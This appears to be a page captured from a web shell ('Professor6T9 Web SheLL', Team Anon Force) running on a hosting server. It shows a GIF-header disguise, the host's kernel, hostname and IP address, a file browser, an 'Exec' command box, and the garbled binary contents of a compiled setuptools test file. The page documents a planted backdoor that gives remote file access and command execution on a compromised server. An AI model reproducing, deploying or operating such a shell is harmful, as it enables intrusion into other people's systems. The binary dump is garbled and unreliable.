GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
setuptools
/
tests
/
__pycache__
[ HOME ]
Exec
Submit
test_windows_wrappers.cpython-311.pyc
� ,|oi� � �� � d Z ddlZddlZddlZddlZddlZddlZddlmZ ej � ej dk d�� � Z G d� d� � Zd � Z G d � de� � Z G d� d e� � ZdS )a1 Python Script Wrapper for Windows ================================= setuptools includes wrappers for Python scripts that allows them to be executed like regular windows programs. There are 2 wrappers, one for command-line programs, cli.exe, and one for graphical programs, gui.exe. These programs are almost identical, function pretty much the same way, and are generated from the same source file. The wrapper programs are used by copying them to the directory containing the script they are to wrap and with the same name as the script they are to wrap. � N)� resources�win32zWindows only)�reasonc �: � e Zd Zed� � � Zed� � � ZdS )� WrapperTesterc �b � t j t j g� � }|t � � z S )N)� subprocess�list2cmdline�sys� executable�locals)�cls�template� python_exes �x/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/setuptools/tests/test_windows_wrappers.py�prep_scriptzWrapperTester.prep_script s&